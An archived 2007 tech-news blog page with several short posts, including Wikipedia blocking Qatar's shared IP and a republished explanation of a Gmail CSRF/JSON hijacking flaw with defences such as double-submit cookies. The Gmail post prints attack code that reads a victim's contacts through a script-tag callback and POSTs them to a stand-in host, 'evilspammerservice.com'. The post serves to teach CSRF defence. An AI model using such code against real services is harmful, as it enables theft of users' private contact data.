Archive for January 1st, 2007

Wikipedia Bans Qatar

Written by on Monday, January 1st, 2007 in Ajax News.

Qatar, home to nearly a million people, has been blocked from editing any entry on Wikipedia “due to a large volume of spam and vandalism.”

Apparently Qatar has a single ISP, Qtel, with a single IP address shared by the entire country. Wikipedia has blocked that IP address for anonymous edits, but is allowing users of that IP address with actual Wikipedia accounts to continue to edit articles. There's one problem, though. You can't create an account if you enter Wikipedia from that IP address. It's a bit of a Catch-22, and users will be forced to either use a proxy to enter the site (many of which are also banned), or simply stop editing altogether.

One answer to this problem is for Wikipedia to end anonymous editing and force user accounts on anyone that wants to contribute.

Digg blocks accounts based on IP address, too. I wonder if they’ve also banned Qatar.

Source: TechCrunch
Original Article: http://feeds.feedburner.com/~r/Techcrunch/~3/69566862/

EroShare - User Generated Porn

Written by on Monday, January 1st, 2007 in Ajax News.

What better way to ring in the new year than with a site that is most definitely not work safe. Eroshare is to Flickr what PornoTube is to YouTube - user generated porn. The site, which launched an hour ago, encourages users to upload their home made erotic photos, and there is already a bunch of content on the site. EroShare gives 2 GB of free storage with every account and has all the standard photo site bells and whistles - friends, tagging, albums, etc. Eroshare is based - where else - in the Netherlands, and has not yet raised any funding.

Porn obviously continues to be a lucrative Internet business, and user generated stuff is apparently a healthy category if PornoTube’s growth is any indication. Just realize that the innocent photo you took with your boyfriend, girlfriend, ex-spouse or random stranger may very quickly end up in front of millions.

Source: TechCrunch
Original Article: http://feeds.feedburner.com/~r/Techcrunch/~3/69503135/

Another Gmail Problem

Written by on Monday, January 1st, 2007 in Ajax News.

The last thing I want to do right now is post on another problem over at Google, but this was a big one. Basically, a website could download your entire Gmail contact list by adding a bit of code to their server and exploiting Google’s JSON API. The problem has apparently been fixed, very soon after the vulnerability was found.

I’m not going to go on and on (again) about how much trouble Google is getting into with these problems. In this case, days did not go by before Google responded to the problem. They addressed it immediately.

This is good fodder for the ongoing JSON debate, though.

Source: TechCrunch
Original Article: http://feeds.feedburner.com/~r/Techcrunch/~3/69473134/

Gmail CSRF Security Flaw

Written by on Monday, January 1st, 2007 in Ajax News.

There is a lot of chatter regarding a CSRF security flaw in Gmail.

CSRF attacks are Cross Site Request Forgery attacks, which are cousins of XSS, but different.

Joe Walker of DWR has written a detailed account of CSRF and how to avoid exposing your applications to them.

Anatomy of the Gmail Attack

If you were logged onto GMail then visiting this page will show you all your GMail contacts. How does it work?

The attack uses script tags and simply assumes that you are logged on. Since most GMail users are permanently logged on, that assumption rarely fails.

There is a Google URL that returns some script containing your contacts:


http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999

The page will look like this:

JAVASCRIPT:

    google({
      Success: true,
      Errors: [],
      Body: {
        AuthToken: {
          Value: '********'
        },
        Contacts: [
          {
            Id: '***',
            Email: 'users at dwr.dev.java.net',
            Affinity: ***,
            Groups: [
              {
                id: '^Freq',
                value: 'users at dwr.dev.java.net'
              }
            ],
            Addressess: [],
            Phoness: [],
            Imss: []
          },
        // Lots more contacts here
        ]
      }
    })

So we're calling a function "google()" and passing it a data structure that includes all your contacts. All we need to do is do something with this data. The page I linked to earlier creates a list from it using code like this:

HTML:

    <script type="text/javascript">
    function google(data){
        // accumulate one list item per contact; start from an empty string
        var emails = "", i;
        for (i = 0; i < data.Body.Contacts.length; i++) {
            emails += "<li>" + data.Body.Contacts[i].Email + "</li>";
        }
        document.write("<ol>" + emails + "</ol>");
    }
    </script>

    <script type="text/javascript" src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">
    </script>

But it would be just as easy to post the list of addresses off to some spam address catcher service:

HTML:

    <script type="text/javascript">
    function google(data){
        // build a newline-separated list of addresses; start from an empty string
        var body = "", i;
        for (i = 0; i < data.Body.Contacts.length; i++) {
            body += data.Body.Contacts[i].Email + "\n";
        }
        var xhr = new ActiveXObject("Microsoft.XMLHTTP");
        xhr.open("POST", "http://evilspammerservice.com/catcher");
        xhr.send(body);
    }
    </script>

How to Protect Your Server

There are 2 known solutions to CSRF attacks: secret hidden fields and scripted cookies.

Things that won't protect you:

  • Switching to POST and denying GET: Forms can be trivially altered with DOM manipulation to forge POST requests.
  • Checking the referrer field: the referrer field is open to manipulation and it is sometimes not sent by browsers. So you are left with a choice between allowing no referrer (an attacker can get around this) and denying no referrer (breaks many innocent users).
  • JSON: Removing the function call in the GMail example would mean we would have to use XHR rather than just a simple script tag. The door is still wide open.

Secret Hidden Fields

If all your sensitive URLs contain some secret shipped with the page, then the cross-domain rules in the browser will stop an attacker from discovering the secret, so the server can distinguish submissions that come from pages it supplied (which are safe) from those that come from anywhere else.

This technique is good for the "Web 1.0" situations which are light on scripting. It is fairly complex to set up because it requires the server to keep track of the secret, and to manipulate all forms to contain a hidden field.

Double Submit the Cookie

The CSRF attack works by subverting what the browser will do with the cookie. Ideally, your cookies would be totally unavailable to anyone outside of your domain. This attack works because XMLHttpRequest in some page can use the cookies of some foreign domain when posting to that foreign domain. However, the script cannot read the cookie directly, due to the cross-domain rules, so a slight modification of the hidden-field solution is to read the session cookie using JavaScript, add it to URLs, forms or the body of a POST request, and then check on the server that the session cookie value the browser sends in the header (which is subvertable) is the same as the session cookie value in the request (which is not subvertable in the same way).

If you are using Ajax or a significant amount of scripting then this solution is a simple fix-once solution.

Use a Library

Specifically - use DWR. If you are using DWR version 2 then this CSRF protection comes for free. DWR implements the double cookie submission pattern transparently.

There is some talk on ZDNet and it appears that Digg may have the same issue.

Source: Ajaxian
Original Article: http://ajaxian.com/archives/gmail-csrf-security-flaw

GCalendar: Accessing Google Calendar from JavaScript

Written by on Monday, January 1st, 2007 in Ajax News.

Christian Decker wanted to access Google Calendar’s new JSON services in a simple way, so he has created, and shared GCalendar, an API for doing just that.

JAVASCRIPT:

    var cal = new Calendar("7cghno42lleqpbihmoi5qiikm8%40group.calendar.google.com");

    cal.onsuccess = function(c){ alert(c); }
    cal.loadFeed();

Source: Ajaxian
Original Article: http://ajaxian.com/archives/gcalendar-accessing-google-calendar-from-javascript

jsFlickrSlideshow: Sliding through Flickr

Written by on Monday, January 1st, 2007 in Ajax News.

The jsFlickrSlideshow is a JavaScript component that wraps the canvas tag to display images from Flickr.

Source: Ajaxian
Original Article: http://ajaxian.com/archives/jsflickrslideshow-sliding-through-flickr
